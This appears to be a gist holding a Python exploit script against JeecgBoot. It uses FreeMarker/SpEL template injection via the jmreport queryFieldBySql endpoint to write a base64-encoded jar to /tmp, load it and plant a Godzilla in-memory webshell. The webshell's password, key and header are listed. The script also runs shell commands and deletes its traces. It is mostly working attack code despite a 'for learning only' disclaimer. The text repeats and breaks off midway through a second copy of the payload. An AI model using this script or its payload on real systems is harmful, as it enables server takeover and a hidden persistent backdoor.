ReaJason/jeecg-boot-godzilla.py Secret

## jeecg-boot-godzilla.py
"""
请勿在生产环境使用，当前脚本仅做学习使用
"""
import requests
import time

poc1 = """
${"freemarker.template.utility.ObjectConstructor"?new()("javax.script.ScriptEngineManager").getEngineByName("js").eval("new java.net.URLClassLoader([new java.net.URL('file:///Users/reajason/Downloads/EncryptionUtils.jar')], java.lang.Thread.currentThread().getContextClassLoader()).loadClass('com.fasterxml.jackson.tnh.EncryptionUtils').newInstance()")}
"""

poc2 = """
${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(\"file:///Users/reajason/Downloads/ImageUtil.jar\")}, T(java.lang.Thread).currentThread().getContextClassLoader()).loadClass(\"org.apache.commons.lang.ContextLoaderTfhoListener\").newInstance()").getValue()}
"""

"""
加密器: JAVA_AES_BASE64
地址: /*
密码: pass
密钥: key
请求头: User-Agent:Kndux
内存马类名: org.apache.SessionHiInterceptor
注入器类名: org.apache.commons.lang.tajy.HttpUtil
"""
jar_file_base64 = "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"
write_tmp_jar_file = "/tmp/temp.jar"
mem_class_name = "org.apache.commons.lang.tajy.HttpUtil"
back_url = "http://localhost:8080/jeecg-boot"

def split_string(long_string, chunk_length=100):
    for i in range(0, len(long_string), chunk_length):
        yield long_string[i:i + chunk_length]


def inject(payload):
    url = back_url + "/jmreport/queryFieldBySql"

    payload = {
        "sql": payload,
        "type": "0"
    }
    headers = {
        'Content-Type': 'application/json'
    }
    res = requests.request("POST", url, headers=headers, json=payload)
    print(res.text)


def write_jar():
    generator = split_string(jar_file_base64)
    for segment in generator:
        seg_payload = """<#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("T(org.apache.commons.io.FileUtils).writeByteArrayToFile(new java.io.File('""" + write_tmp_jar_file + """'), T(org.springframework.util.Base64Utils).decodeFromString('""" + segment + """'), true)").getValue()}"""
        inject(seg_payload)


def rm_jar():
    rm_payload = """<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"rm """ + write_tmp_jar_file + """\")}"""
    inject(rm_payload)


def load_class():
    load_payload = """"<#assign ex=\"freemarker.template.utility.ObjectConstructor\"?new()>${ex(\"org.springframework.expression.spel.standard.SpelExpressionParser\").parseExpression(\"new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(\\\"file://""" + write_tmp_jar_file + """\\\")}, T(java.lang.Thread).currentThread().getContextClassLoader()).loadClass(\\\"""" + mem_class_name + """\\\").newInstance()\").getValue()}"""
    inject(load_payload)


if __name__ == '__main__':
    start_time = time.time()
    rm_jar()
    write_jar()
    load_class()
    rm_jar()
    end_time = time.time()
    runtime = end_time - start_time
    print(f"耗时: {runtime:.6f} seconds")
	"""
	请勿在生产环境使用，当前脚本仅做学习使用
	"""
	import requests
	import time

	poc1 = """
	${"freemarker.template.utility.ObjectConstructor"?new()("javax.script.ScriptEngineManager").getEngineByName("js").eval("new java.net.URLClassLoader([new java.net.URL('file:///Users/reajason/Downloads/EncryptionUtils.jar')], java.lang.Thread.currentThread().getContextClassLoader()).loadClass('com.fasterxml.jackson.tnh.EncryptionUtils').newInstance()")}
	"""

	poc2 = """
	${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(\"file:///Users/reajason/Downloads/ImageUtil.jar\")}, T(java.lang.Thread).currentThread().getContextClassLoader()).loadClass(\"org.apache.commons.lang.ContextLoaderTfhoListener\").newInstance()").getValue()}
	"""

	"""
	加密器: JAVA_AES_BASE64
	地址: /*
	密码: pass
	密钥: key
	请求头: User-Agent:Kndux
	内存马类名: org.apache.SessionHiInterceptor
	注入器类名: org.apache.commons.lang.tajy.HttpUtil
	"""
	jar_file_base64 = "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